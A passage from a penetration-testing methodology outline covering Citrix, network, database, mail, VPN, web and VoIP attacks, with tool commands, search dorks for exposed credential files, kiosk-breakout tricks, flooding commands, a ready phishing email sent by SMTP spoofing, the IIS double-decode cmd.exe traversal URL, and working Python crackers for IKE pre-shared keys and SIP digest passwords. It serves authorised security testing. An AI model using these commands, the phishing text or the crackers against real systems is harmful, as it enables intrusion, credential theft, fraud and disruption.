20.6.2.1. Vulnerabilities and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=cisco+IOS

20.7. Configuration Files.

20.7.1. Untitled

20.7.1.1. Configuration files explained

20.7.1.1.1. The line that reads "enable password router", where "router" is the password, is the TTY console password, which is superseded by the enable secret password for remote access.

20.7.1.1.2. Untitled

20.7.1.1.3. Untitled

20.7.1.1.4. Password Encryption Utilised

20.7.1.1.5. Untitled

20.7.1.2. Configuration Testing Tools

20.7.1.2.1. Nipper

20.7.1.2.2. fwauto (Beta)

20.8. References.

20.8.1. Cisco IOS Exploitation Techniques

21. Citrix Specific Testing

21.1. Citrix provides remote access services to multiple users across a wide range of platforms. I have put together the following information, which will hopefully help you conduct a vulnerability assessment/ penetration test against Citrix.

21.2. Enumeration

21.2.1. web search

21.2.1.1. Google (GHDB)

21.2.1.1.1. ext:ica

21.2.1.1.2. inurl:citrix/metaframexp/default/login.asp

21.2.1.1.3. [WFClient] Password= filetype:ica

21.2.1.1.4. inurl:citrix/metaframexp/default/login.asp? ClientDetection=On

21.2.1.1.5. inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"

21.2.1.1.6. inurl:/Citrix/Nfuse17/

21.2.1.1.7. inurl:Citrix/MetaFrame/default/default.aspx

21.2.1.2. Google Hacks (Author Discovered)

21.2.1.2.1. filetype:ica Username=

21.2.1.2.2. inurl:/Citrix/AccessPlatform/

21.2.1.2.3. inurl:LogonAgent/Login.asp

21.2.1.2.4. inurl:/CITRIX/NFUSE/default/login.asp

21.2.1.2.5. inurl:/Citrix/NFuse161/login.asp

21.2.1.2.6. inurl:/Citrix/NFuse16

21.2.1.2.7. inurl:/Citrix/NFuse151/

21.2.1.2.8. allintitle:MetaFrame XP Login

21.2.1.2.9. allintitle:MetaFrame Presentation Server Login

21.2.1.2.10. inurl:Citrix/~bespoke_company_name~/default/login.aspx?ClientDetection=On

21.2.1.2.11. allintitle:Citrix(R) NFuse(TM) Classic Login

21.2.1.3. Yahoo

21.2.1.3.1. originurlextension:ica

21.2.2. site search

21.2.2.1. Manual

21.2.2.1.1. review web page for useful information

21.2.2.1.2. review source for web page

21.2.3. generic

21.2.3.1. nmap -A -PN -p 80,443,1494 ip_address

21.2.3.2. amap -bqv ip_address port_no.

21.2.4. citrix specific

21.2.4.1. enum.pl

21.2.4.1.1. perl enum.pl ip_address

21.2.4.2. enum.js

21.2.4.2.1. enum.js apps TCPBrowserAddress=ip_address

21.2.4.3. connect.js

21.2.4.3.1. connect.js TCPBrowserAddress=ip_address Application=advertised-application

21.2.4.4. Citrix-pa-scan

21.2.4.4.1. perl pa-scan.pl ip_address [timeout] > pas.wri

21.2.4.5. pabrute.c

21.2.4.5.1. ./pabrute pubapp list app_list ip_address

21.2.5. Default Ports

21.2.5.1. TCP

21.2.5.1.1. Citrix XML Service

21.2.5.1.2. Advanced Management Console

21.2.5.1.3. Citrix SSL Relay

21.2.5.1.4. ICA sessions

21.2.5.1.5. Server to server

21.2.5.1.6. Management Console to server

21.2.5.1.7. Session Reliability (Auto-reconnect)

21.2.5.1.8. License Management Console

21.2.5.1.9. License server

21.2.5.2. UDP

21.2.5.2.1. Clients to ICA browser service

21.2.5.2.2. Server-to-server

21.2.6. nmap nse scripts

21.2.6.1. citrix-enum-apps

21.2.6.1.1. nmap -sU --script=citrix-enum-apps -p 1604 <host>

21.2.6.2. citrix-enum-apps-xml

21.2.6.2.1. nmap --script=citrix-enum-apps-xml -p 80,443 <host>

21.2.6.3. citrix-enum-servers

21.2.6.3.1. nmap -sU --script=citrix-enum-servers -p 1604

21.2.6.4. citrix-enum-servers-xml

21.2.6.4.1. nmap --script=citrix-enum-servers-xml -p 80,443 <host>

21.2.6.5. citrix-brute-xml

21.2.6.5.1. nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443 <host>

21.3. Scanning

21.3.1. Nessus

21.3.1.1. Plugins

21.3.1.1.1. CGI abuses

21.3.1.1.2. CGI abuses : Cross Site Scripting (XSS)

21.3.1.1.3. Misc.

21.3.1.1.4. Service Detection

21.3.1.1.5. Web Servers

21.3.1.1.6. Windows

21.3.2. Nikto

21.3.2.1. perl nikto.pl -host ip_address -port port_no.

21.3.2.1.1. Untitled

21.4. Exploitation

21.4.1. Alter default .ica files

21.4.1.1. InitialProgram=cmd.exe

21.4.1.2. InitialProgram=explorer.exe

21.4.2. Enumerate and Connect

21.4.2.1. For applications identified by Citrix-pa-scan

21.4.2.1.1. Pas

21.4.2.2. For published applications with a Citrix client when the master browser is non-public.

21.4.2.2.1. Citrix-pa-proxy

21.4.3. Manual Testing

21.4.3.1. Create Batch File (cmd.bat)

21.4.3.1.1. 1

21.4.3.1.2. 2

21.4.3.2. Host Scripting File (cmd.vbs)

21.4.3.2.1. Option Explicit

21.4.3.2.2. Dim objShell

21.4.3.2.3. objShell.Run "%comspec% /k"

21.4.3.2.4. WScript.Quit

21.4.3.2.5. alternative functionality

21.4.3.3. iKat

21.4.3.3.1. Integrated Kiosk Attack Tool

21.4.3.4. AT Command - privilege escalation

21.4.3.4.1. AT HH:MM /interactive "cmd.exe"

21.4.3.4.2. AT HH:MM /interactive %comspec% /k

21.4.3.4.3. Untitled

21.4.3.5. Keyboard Shortcuts/ Hotkeys

21.4.3.5.1. Ctrl + h – View History

21.4.3.5.2. Ctrl + n – New Browser

21.4.3.5.3. Shift + Left Click – New Browser

21.4.3.5.4. Ctrl + o – Internet Address (browse feature)

21.4.3.5.5. Ctrl + p – Print (to file)

21.4.3.5.6. Right Click (Shift + F10)

21.4.3.5.7. F1 – Jump to URL

21.4.3.5.8. SHIFT+F1: Local Task List

21.4.3.5.9. SHIFT+F2: Toggle Title Bar

21.4.3.5.10. SHIFT+F3: Close Remote Application

21.4.3.5.11. CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del

21.4.3.5.12. CTRL+F2: Remote Task List

21.4.3.5.13. CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC

21.4.3.5.14. ALT+F2: Cycle through programs

21.4.3.5.15. ALT+PLUS: Alt+TAB

21.4.3.5.16. ALT+MINUS: ALT+SHIFT+TAB

21.5. Brute Force

21.5.1. bforce.js

21.5.1.1. bforce.js TCPBrowserAddress=ip_address usernames=user1,user2 passwords=pass1,pass2

21.5.1.2. bforce.js HTTPBrowserAddress=ip_address userfile=file.txt passfile=file.txt

21.5.1.3. Untitled

21.6. Review Configuration Files

21.6.1. Application server configuration file

21.6.1.1. appsrv.ini

21.6.1.1.1. Location

21.6.1.1.2. World writeable

21.6.1.1.3. Review other files

21.6.1.1.4. Sample file

21.6.2. Program Neighborhood configuration file

21.6.2.1. pn.ini

21.6.2.1.1. Location

21.6.2.1.2. Review other files

21.6.2.1.3. Sample file

21.6.3. Citrix ICA client configuration file

21.6.3.1. wfclient.ini

21.6.3.1.1. Location

21.7. References

21.7.1. Vulnerabilities

21.7.1.1. Art of Hacking

21.7.1.2. Common Vulnerabilities and Exploits (CVE)

21.7.1.2.1. Sample file

21.7.1.2.2. Untitled

21.7.1.2.3. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=citrix

21.7.1.3. OSVDB

21.7.1.3.1. http://osvdb.org/search/search?search[vuln_title]=Citrix&search[text_type]=titles&search[s_date]=&search[e_date]=&search[refid]=&search[referencetypes]=&search[vendors]=&kthx=search

21.7.1.4. Secunia

21.7.1.5. Security-database.com

21.7.1.5.1. http://www.security-database.com/cgi-bin/search-sd.cgi?q=Citrix

21.7.1.6. SecurityFocus

21.7.2. Support

21.7.2.1. Citrix

21.7.2.1.1. Knowledge Base

21.7.2.2. Thinworld

21.7.3. Exploits

21.7.3.1. Milw0rm

21.7.3.1.1. http://www.milw0rm.com/search.php

21.7.3.2. Art of Hacking

21.7.3.2.1. Citrix

21.7.4. Tools Resource

21.7.4.1. Zip file containing the majority of the tools mentioned in this article, for easy download/ access

22. Network Backbone

22.1. Generic Toolset

22.1.1. Wireshark (Formerly Ethereal)

22.1.1.1. Passive Sniffing

22.1.1.1.1. Usernames/Passwords

22.1.1.1.2. Email

22.1.1.1.3. FTP

22.1.1.1.4. HTTP

22.1.1.1.5. HTTPS

22.1.1.1.6. RDP

22.1.1.1.7. VOIP

22.1.1.1.8. Other

22.1.1.2. Filters

22.1.1.2.1. ip.src == ip_address

22.1.1.2.2. ip.dst == ip_address

22.1.1.2.3. tcp.dstport == port_no.

22.1.1.2.4. ! ip.addr == ip_address

22.1.1.2.5. (ip.addr eq ip_address and ip.addr eq ip_address) and (tcp.port eq 1829 and tcp.port eq 1863)

22.1.2. Cain & Abel

22.1.2.1. Active Sniffing

22.1.2.1.1. ARP Cache Poisoning

22.1.2.1.2. DNS Poisoning

22.1.2.1.3. Routing Protocols

22.1.3. Cisco-Torch

22.1.3.1. ./cisco-torch.pl <options> <IP,hostname,network> or ./cisco-torch.pl <options> -F <hostlist>

22.1.4. NTP-Fingerprint

22.1.4.1. perl ntp-fingerprint.pl -t [ip_address]

22.1.5. Yersinia

22.1.6. p0f

22.1.6.1. ./p0f [ -f file ] [ -i device ] [ -s file ] [ -o file ] [ -w file ] [ -Q sock ] [ -u user ] [ -FXVONDUKASCMRqtpvdlr ] [ -c size ] [ -T nn ] [ 'filter rule' ]

22.1.7. Manual Check (Credentials required)

22.1.8. MAC Spoofing

22.1.8.1. mac address changer for windows

22.1.8.2. macchanger

22.1.8.2.1. Random Mac Address:- macchanger -r eth0

22.1.8.3. madmacs

22.1.8.4. smac

22.1.8.5. TMAC

23. Penetration - An exploit usually relates to the existence of some flaw or vulnerability in an application or operating system that, if used, could lead to privilege escalation or denial of service against the computer system being attacked. Exploits can be compiled and used manually, or through one of the various exploitation engines, which at their simplest are pre-compiled point-and-shoot tools. These engines also have a number of extra underlying features for more advanced users.

23.1. Password Attacks

23.1.1. Known Accounts

23.1.1.1. Identified Passwords

23.1.1.2. Unidentified Hashes

23.1.2. Default Accounts

23.1.2.1. Identified Passwords

23.1.2.2. Unidentified Hashes

23.2. Exploits

23.2.1. Successful Exploits

23.2.1.1. Accounts

23.2.1.1.1. Passwords

23.2.1.1.2. Groups

23.2.1.1.3. Other Details

23.2.1.2. Services

23.2.1.3. Backdoor

23.2.1.4. Connectivity

23.2.2. Unsuccessful Exploits

23.2.3. Resources

23.2.3.1. Securiteam

23.2.3.1.1. Exploits are sorted by year and must be downloaded individually

23.2.3.2. SecurityForest

23.2.3.2.1. Updated via CVS after initial install

23.2.3.3. GovernmentSecurity

23.2.3.3.1. Need to create an account to obtain access

23.2.3.4. Red Base Security

23.2.3.4.1. Oracle Exploit site only

23.2.3.5. Wireless Vulnerabilities & Exploits (WVE)

23.2.3.5.1. Wireless Exploit Site

23.2.3.6. PacketStorm Security

23.2.3.6.1. Exploits downloadable by month and year but no indexing carried out.

23.2.3.7. SecWatch

23.2.3.7.1. Exploits sorted by year and month, downloaded separately

23.2.3.8. SecurityFocus

23.2.3.8.1. Exploits must be downloaded individually

23.2.3.9. Metasploit

23.2.3.9.1. Install and regularly update via svn

23.2.3.10. Milw0rm

23.2.3.10.1. Exploit archive indexed and sorted by port, downloadable as a whole - The one to go for!

23.3. Tools

23.3.1. Metasploit

23.3.1.1. Free Extra Modules

23.3.1.1.1. local copy

23.3.2. Manual SQL Injection

23.3.2.1. Understanding SQL Injection

23.3.2.2. SQL Injection walkthrough

23.3.2.3. SQL Injection by example

23.3.2.4. Blind SQL Injection

23.3.2.5. Advanced SQL Injection in SQL Server

23.3.2.6. More Advanced SQL Injection

23.3.2.7. Advanced SQL Injection in Oracle databases

23.3.2.8. SQL Cheatsheets

23.3.2.8.1. Untitled

23.3.3. SQL Power Injector

23.3.4. SecurityForest

23.3.5. SPI Dynamics WebInspect

23.3.6. Core Impact

23.3.7. Cisco Global Exploiter

23.3.8. PIXDos

23.3.8.1. perl PIXdos.pl [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=MAC] [--destmac=MAC] [--port=n]

23.3.9. CANVAS

23.3.10. Inguma

24. Server Specific Tests

24.1. Databases

24.1.1. Direct Access Interrogation

24.1.1.1. MS SQL Server

24.1.1.1.1. Ports

24.1.1.1.2. Version

24.1.1.1.3. osql

24.1.1.2. Oracle

24.1.1.2.1. Ports

24.1.1.2.2. TNS Listener

24.1.1.2.3. SQL Plus

24.1.1.2.4. Default Account/Passwords

24.1.1.2.5. Default SID's

24.1.1.3. MySQL

24.1.1.3.1. Ports

24.1.1.3.2. Version

24.1.1.3.3. Users/Passwords

24.1.1.4. DB2

24.1.1.5. Informix

24.1.1.6. Sybase

24.1.1.7. Other

24.1.2. Scans

24.1.2.1. Default Ports

24.1.2.2. Non-Default Ports

24.1.2.3. Instance Names

24.1.2.4. Versions

24.1.3. Password Attacks

24.1.3.1. Sniffed Passwords

24.1.3.1.1. Cracked Passwords

24.1.3.1.2. Hashes

24.1.3.2. Direct Access Guesses

24.1.4. Vulnerability Assessment

24.1.4.1. Automated

24.1.4.1.1. Reports

24.1.4.1.2. Vulnerabilities

24.1.4.2. Manual

24.1.4.2.1. Patch Levels

24.1.4.2.2. Confirmed Vulnerabilities

24.2. Mail

24.2.1. Scans

24.2.2. Fingerprint

24.2.2.1. Manual

24.2.2.2. Automated

24.2.3. Spoofable

24.2.3.1. Telnet spoof

24.2.3.1.1. telnet target_IP 25
helo target.com
mail from: [email protected]
to: [email protected]: [email protected]: [192.168.1.1]
X-Originating-Email: [[email protected]]
MIME-Version: 1.0
To: <[email protected]>
From: < [email protected] >
Subject: Important! Account check required
Content-Type: text/html
Content-Transfer-Encoding: 7bit

Dear Valued Customer,
The corporate network has recently gone through a critical update to the Active Directory, we have done this to increase security of the network against hacker attacks to protect your private information. Due to this, you are required to log onto the following website with your current credentials to ensure that your account does not expire.
Please go to the following website and log in with your account details. <a href=http://192.168.1.108/hacme.html>www.target.com/login</a>
Online Security Manager.
Target [email protected]

24.2.4. Relays

24.3. VPN

24.3.1. Scanning

24.3.1.1. 500 UDP IPSEC

24.3.1.2. 1723 TCP PPTP

24.3.1.3. 443 TCP/SSL

24.3.1.4. nmap -sU -PN -p 500 80.75.68.22-27

24.3.1.5. ipsecscan 80.75.68.22 80.75.68.27

24.3.2. Fingerprinting

24.3.2.1. ike-scan --showbackoff 80.75.68.22 80.75.68.27

24.3.3. PSK Crack

24.3.3.1. ikeprobe 80.75.68.27

24.3.3.2. Sniff the aggressive-mode responses with Cain & Abel or IKECrack and run a dictionary attack against the captured PSK hash offline.
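
The arithmetic behind the PSK crack step, as an added example that is not part of the original framework: in IKEv1 aggressive mode the responder sends HASH_R in the clear before the initiator has authenticated, and every input to it except the pre-shared key is visible on the wire, so a single sniffed exchange can be attacked offline. The record format follows the colon-separated line that ike-scan writes with --pskcrack; the sample capture is constructed here with a known key so the result can be checked.

```python
"""Offline dictionary attack on an IKEv1 aggressive-mode pre-shared key: the calculation that
psk-crack (ike-scan) and IKECrack perform on a sniffed exchange.  Added example for the PSK Crack
step, not code from the original framework.  The 'capture' is constructed here with a known key;
field order follows the colon-separated record that ike-scan --pskcrack writes."""
import hashlib
import hmac
import os

FIELDS = ("g_xr", "g_xi", "cky_r", "cky_i", "sai_b", "idir_b", "ni_b", "nr_b", "hash_r")
# Constructed lengths for the sample only: 1024-bit DH values, 8-byte cookies, 20-byte nonces.
SAMPLE_SIZES = {"g_xr": 128, "g_xi": 128, "cky_r": 8, "cky_i": 8,
                "sai_b": 52, "idir_b": 8, "ni_b": 20, "nr_b": 20}


def hash_r(psk, c, digest):
    """RFC 2409 s5.4 with pre-shared-key authentication:
         SKEYID = prf(PSK, Ni_b | Nr_b)
         HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
    In aggressive mode the responder sends HASH_R in its first reply, before the initiator has
    proved anything; every input except the PSK is visible to a sniffer."""
    skeyid = hmac.new(psk, c["ni_b"] + c["nr_b"], digest).digest()
    msg = c["g_xr"] + c["g_xi"] + c["cky_r"] + c["cky_i"] + c["sai_b"] + c["idir_b"]
    return hmac.new(skeyid, msg, digest).digest()


def parse_psk_line(line):
    """Parse one hex record: g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r."""
    parts = line.strip().split(":")
    if len(parts) != len(FIELDS):
        raise ValueError(f"expected {len(FIELDS)} fields, got {len(parts)}")
    return dict(zip(FIELDS, (bytes.fromhex(p) for p in parts)))


def crack(capture, wordlist):
    """Try every candidate under the IKEv1 prf choices; the length of HASH_R (16 or 20 bytes)
    tells which hash the peers negotiated.  Returns (psk, hash_name) or None."""
    target = capture["hash_r"]
    digests = [d for d in (hashlib.md5, hashlib.sha1) if d().digest_size == len(target)]
    for word in wordlist:
        for digest in digests:
            if hmac.compare_digest(hash_r(word.encode(), capture, digest), target):
                return word, digest().name
    return None


def make_sample(psk, hash_name="sha1"):
    """Constructed capture line: random public values, HASH_R computed under the given key."""
    digest = getattr(hashlib, hash_name)
    c = {k: os.urandom(n) for k, n in SAMPLE_SIZES.items()}
    c["hash_r"] = hash_r(psk.encode(), c, digest)
    return ":".join(c[k].hex() for k in FIELDS)


def demo():
    """Recover a constructed PSK from a small wordlist."""
    return crack(parse_psk_line(make_sample("secret123")), ["password", "cisco", "secret123", "vpn"])


if __name__ == "__main__":
    print(demo())   # ('secret123', 'sha1')
```

With a real capture, feed each line of the ike-scan --pskcrack output file to parse_psk_line and a wordlist to crack. Main mode does not expose the hash this way, which is why the test is only meaningful where the gateway accepts aggressive mode (the ike-scan -A probe tells you).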

24.4. Web

24.4.1. Vulnerability Assessment

24.4.1.1. Automated

24.4.1.1.1. Reports

24.4.1.1.2. Vulnerabilities

24.4.1.2. Manual

24.4.1.2.1. Patch Levels

24.4.1.2.2. Confirmed Vulnerabilities

24.4.2. Permissions

24.4.2.1. PUT /test.txt HTTP/1.0

24.4.2.2. CONNECT mail.another.com:25 HTTP/1.0

24.4.2.3. POST http://mail.another.com:25/ HTTP/1.0
Content-Type: text/plain
Content-Length: 6

24.4.3. Scans

24.4.4. Fingerprinting

24.4.4.1. Other

24.4.4.2. HTTP

24.4.4.2.1. Commands

24.4.4.2.2. Modules

24.4.4.2.3. File Extensions

24.4.4.3. HTTPS

24.4.4.3.1. Commands

24.4.4.3.2. Modules

24.4.4.3.3. File Extensions

24.4.5. Directory Traversal

24.4.5.1. http://www.target.com/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
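
Why the ..%255c.. request above works, as an added example that is not part of the original framework: the server checks the path after one URL decode, where %255c has become the harmless-looking %5c and the segment "..%5c.." does not leave /scripts, then decodes a second time before the filesystem call, where %5c becomes a backslash and the path resolves to \winnt\system32. The two functions below are constructed models of the flawed and the fixed check, not any specific server's source; the /scripts root is an assumption.

```python
"""Why '..%255c..' slips past the server's path check: the check is made after one URL decode,
then the path is decoded a second time before the filesystem sees it, so '%255c' becomes '%5c'
(harmless-looking) and then '\\' (a separator).  Added example for the Directory Traversal step;
not code from the original framework, and the two checks below are constructed models of the
flawed and the fixed behaviour, not any particular server's source."""
from urllib.parse import unquote

WEB_ROOT = "/scripts"   # assumed: the virtual directory the request is allowed to touch


def resolve(path):
    """Canonicalise: treat '/' and '\\' as separators, drop '.' segments, apply '..'."""
    out = []
    for seg in path.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
        else:
            out.append(seg)
    return "/" + "/".join(out)


def inside_root(canonical):
    return canonical == WEB_ROOT or canonical.startswith(WEB_ROOT + "/")


def vulnerable_check(url_path):
    """Model of the flawed pipeline: decode once, check, then decode again for the filesystem.
    Returns the path that would actually be opened/executed, or None if the request is refused."""
    once = unquote(url_path)
    if not inside_root(resolve(once)):
        return None
    fs_path = unquote(once)          # second decode: '%5c' -> '\' only now becomes a separator
    return resolve(fs_path)


def hardened_check(url_path):
    """Fixed pipeline: decode to a fixed point, refuse input that still changes under decoding,
    check the canonical form once, and use exactly that string for the filesystem access."""
    once = unquote(url_path)
    if unquote(once) != once:
        return None                  # double-encoded request: reject, do not try to normalise
    canonical = resolve(once)
    if not inside_root(canonical):
        return None
    return canonical


if __name__ == "__main__":
    attack = "/scripts/..%255c../winnt/system32/cmd.exe"
    print(vulnerable_check(attack))  # /winnt/system32/cmd.exe
    print(hardened_check(attack))    # None
```

The single-encoded forms (../ and ..%5c..) are caught by both checks; only the double-encoded form gets through the vulnerable one, which is the behaviour to look for when the server is not patched. The general rule the hardened version applies is: decode and canonicalise once, check, and pass that same canonical string on, never a representation that will be decoded again downstream.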

25. VoIP Security

25.1. Sniffing Tools

25.1.1. AuthTool

25.1.2. Cain & Abel

25.1.3. Etherpeek

25.1.4. NetDude

25.1.5. Oreka

25.1.6. PSIPDump

25.1.7. SIPomatic

25.1.8. SIPv6 Analyzer

25.1.9. UCSniff

25.1.10. VoiPong

25.1.11. VOMIT

25.1.12. Wireshark

25.1.13. WIST - Web Interface for SIP Trace

25.2. Scanning and Enumeration Tools

25.2.1. enumIAX

25.2.2. fping

25.2.3. IAX Enumerator

25.2.4. iWar

25.2.5. Nessus

25.2.6. Nmap

25.2.7. SIP Forum Test Framework (SFTF)

25.2.8. SIPcrack

25.2.9. sipflanker

25.2.9.1. python sipflanker.py 192.168.1-254

25.2.10. SIP-Scan

25.2.11. SIP.Tastic

25.2.12. SIPVicious

25.2.13. SiVuS

25.2.14. SMAP

25.2.14.1. smap IP_Address/Subnet_Mask

25.2.14.2. smap -o IP_Address/Subnet_Mask

25.2.14.3. smap -l IP_Address

25.2.15. snmpwalk

25.2.16. VLANping

25.2.17. VoIPAudit

25.2.18. VoIP GHDB Entries

25.2.19. VoIP Voicemail Database

25.3. Packet Creation and Flooding Tools

25.3.1. H.323 Injection Files

25.3.2. H225regreject

25.3.3. IAXHangup

25.3.4. IAXAuthJack

25.3.5. IAX.Brute

25.3.6. IAXFlooder

25.3.6.1. ./iaxflood sourcename destinationname numpackets

25.3.7. INVITE Flooder

25.3.7.1. ./inviteflood interface target_user target_domain ip_address_target no_of_packets

25.3.8. kphone-ddos

25.3.9. RTP Flooder

25.3.10. rtpbreak

25.3.11. Scapy

25.3.12. Seagull

25.3.13. SIPBomber

25.3.14. SIPNess

25.3.15. SIPp

25.3.16. SIPsak

25.3.16.1. Tracing paths: sipsak -T -s sip:[email protected]

25.3.16.2. OPTIONS request: sipsak -vv -s sip:[email protected]

25.3.16.3. Query registered bindings: sipsak -I -C empty -a password -s sip:[email protected]

25.3.17. SIP-Send-Fun

25.3.18. SIPVicious

25.3.19. Spitter

25.3.20. TFTP Brute Force

25.3.20.1. perl tftpbrute.pl <tftpserver> <filelist> <maxprocesses>

25.3.21. UDP Flooder

25.3.21.1. ./udpflood source_ip target_destination_ip src_port dest_port no_of_packets

25.3.22. UDP Flooder (with VLAN Support)

25.3.22.1. ./udpflood source_ip target_destination_ip src_port dest_port tos user_priority vlan_id no_of_packets

25.3.23. Voiphopper

25.4. Fuzzing Tools

25.4.1. Asteroid

25.4.2. Codenomicon VoIP Fuzzers

25.4.3. Fuzzy Packet

25.4.4. Mu Security VoIP Fuzzing Platform

25.4.5. ohrwurm RTP Fuzzer

25.4.6. PROTOS H.323 Fuzzer

25.4.7. PROTOS SIP Fuzzer

25.4.8. SIP Forum Test Framework (SFTF)

25.4.9. Sip-Proxy

25.4.10. Spirent ThreatEx

25.5. Signaling Manipulation Tools

25.5.1. AuthTool

25.5.1.1. ./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v
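
What AuthTool (and SIPcrack) compute from the captured SIP messages, as an added example that is not part of the original framework: SIP uses HTTP digest authentication, so a single sniffed REGISTER carrying an Authorization header gives username, realm, nonce, URI and the MD5 response, and the password is the only unknown. The REGISTER below is constructed, with its response computed from a known password, so the attack can be checked end to end; the extension, realm, nonce and addresses are made up.

```python
"""Offline dictionary attack on a sniffed SIP digest authentication: the computation behind
AuthTool and SIPcrack.  Added example for the Signaling Manipulation section, not code from the
original framework.  The REGISTER below is constructed, its response computed from a known
password, so the attack can be checked end to end."""
import hashlib
import re


def md5_hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def parse_authorization(sip_message):
    """Extract the Digest parameters (RFC 3261 s22 / RFC 2617) plus the request method."""
    m = re.search(r"^(?:Proxy-)?Authorization:\s*Digest\s+(.*)$", sip_message, re.M | re.I)
    if not m:
        raise ValueError("no Digest (Proxy-)Authorization header")
    params = {}
    for key, quoted, bare in re.findall(r'(\w+)=(?:"([^"]*)"|([^,\s]+))', m.group(1)):
        params[key.lower()] = quoted if quoted else bare
    params["method"] = sip_message.split(None, 1)[0]   # request-line verb, e.g. REGISTER
    return params


def digest_response(password, p):
    """HA1 = MD5(user:realm:pass); HA2 = MD5(method:uri); response = MD5(HA1:nonce:HA2), with
    nc/cnonce/qop inserted when the server asked for qop=auth.  Everything but the password is
    on the wire, so one captured REGISTER is enough for an offline guess."""
    ha1 = md5_hex(f"{p['username']}:{p['realm']}:{password}")
    ha2 = md5_hex(f"{p['method']}:{p['uri']}")
    if p.get("qop"):
        return md5_hex(f"{ha1}:{p['nonce']}:{p['nc']}:{p['cnonce']}:{p['qop']}:{ha2}")
    return md5_hex(f"{ha1}:{p['nonce']}:{ha2}")


def crack(sip_message, wordlist):
    """Return the first candidate whose digest matches the captured response, else None."""
    p = parse_authorization(sip_message)
    for word in wordlist:
        if digest_response(word, p) == p["response"].lower():
            return word
    return None


def build_register(password):
    """Constructed REGISTER as a phone sends it after a 401: realm, nonce and addresses are made up."""
    p = {"username": "200", "realm": "asterisk", "nonce": "2b8d4f3a1c9e",
         "uri": "sip:192.168.1.10", "method": "REGISTER"}
    response = digest_response(password, p)
    return (
        "REGISTER sip:192.168.1.10 SIP/2.0\r\n"
        "Via: SIP/2.0/UDP 192.168.1.50:5060;branch=z9hG4bK776asdhds\r\n"
        "From: <sip:200@192.168.1.10>;tag=1928301774\r\n"
        "To: <sip:200@192.168.1.10>\r\n"
        "Call-ID: a84b4c76e66710@192.168.1.50\r\n"
        "CSeq: 2 REGISTER\r\n"
        f'Authorization: Digest username="{p["username"]}", realm="{p["realm"]}", '
        f'nonce="{p["nonce"]}", uri="{p["uri"]}", response="{response}", algorithm=MD5\r\n'
        "Content-Length: 0\r\n\r\n"
    )


if __name__ == "__main__":
    print(crack(build_register("1234"), ["password", "0000", "1234"]))   # 1234
```

Phone extensions are very often provisioned with short numeric secrets, so a digit-only wordlist is the first thing to try. On a real capture, note that the method and URI come from the request line of the same message, not from the challenge; mixing them up produces a digest that never matches.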

25.5.2. BYE Teardown

25.5.3. Check Sync Phone Rebooter

25.5.4. RedirectPoison

25.5.4.1. ./redirectpoison interface target_source_ip target_source_port "<contact_information i.e. sip:100.77.50.52;line=xtrfgy>"

25.5.5. Registration Adder

25.5.6. Registration Eraser

25.5.7. Registration Hijacker

25.5.8. SIP-Kill

25.5.9. SIP-Proxy-Kill

25.5.10. SIP-RedirectRTP

25.5.11. SipRogue

25.5.12. vnak

25.6. Media Manipulation Tools

25.6.1. RTP InsertSound

25.6.1.1. ./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

25.6.2. RTP MixSound

25.6.2.1. ./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

25.6.3. RTPProxy

25.6.4. RTPInject

25.7. Generic Software Suites

25.7.1. OAT - Office Communications Server Assessment Tool

25.7.2. EnableSecurity VOIPPACK

25.7.2.1. Note: add-on for Immunity CANVAS

25.8. References

25.8.1. URLs

25.8.1.1. Common Vulnerabilities and Exposures (CVE)

25.8.1.1.1. Vulnerability and exploit information relating to these products can be found at: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=voip

25.8.1.2. Default Passwords

25.8.1.3. Hacking Exposed VoIP

25.8.1.3.1. Tool Pre-requisites

25.8.1.4. VoIPsa

25.8.2. White Papers

25.8.2.1. An Analysis of Security Threats and Tools in SIP-Based VoIP Systems

25.8.2.2. An Analysis of VoIP Security Threats and Tools

25.8.2.3. Hacking VoIP Exposed

25.8.2.4. Security testing of SIP implementations

25.8.2.5. SIP Stack Fingerprinting and Stack Difference Attacks

25.8.2.6. Two attacks against VoIP

25.8.2.7. VoIP Attacks!

25.8.2.8. VoIP Security Audit Program (VSAP)

26. Wireless Penetration

26.1. Wireless Assessment. The following information should ideally be obtained or enumerated when carrying out a wireless assessment. All of it is needed to give the tester, and hence the customer, a clear and concise picture of the network being assessed. A brief overview of the network during a pre-site meeting with the customer should allow you to estimate the timescales required to carry out the assessment.

26.1.1. Site Map

26.1.1.1. RF Map

26.1.1.1.1. Lines of Sight

26.1.1.1.2. Signal Coverage

26.1.1.2. Physical Map

26.1.1.2.1. Triangulate APs

26.1.1.2.2. Satellite Imagery

26.1.2. Network Map

26.1.2.1. MAC Filter

26.1.2.1.1. Authorised MAC Addresses

26.1.2.1.2. Reaction to Spoofed MAC Addresses

26.1.2.2. Encryption Keys utilised

26.1.2.2.1. WEP

26.1.2.2.2. WPA/PSK

26.1.2.2.3. 802.1X

26.1.2.3. Access Points

26.1.2.3.1. ESSID

26.1.2.3.2. BSSIDs

26.1.2.4. Wireless Clients

26.1.2.4.1. MAC Addresses

26.1.2.4.2. Intercepted Traffic

26.2. Wireless Toolkit

26.2.1. Wireless Discovery

26.2.1.1. Aerosol

26.2.1.2. Airfart

26.2.1.3. Aphopper

26.2.1.4. Apradar

26.2.1.5. BAFFLE

26.2.1.6. inSSIDer

26.2.1.7. iWEPPro

26.2.1.8. karma

26.2.1.9. KisMAC-ng

26.2.1.10. Kismet

26.2.1.11. MiniStumbler

26.2.1.12. Netstumbler

26.2.1.13. Vistumbler

26.2.1.14. Wellenreiter

26.2.1.15. Wifi Hopper

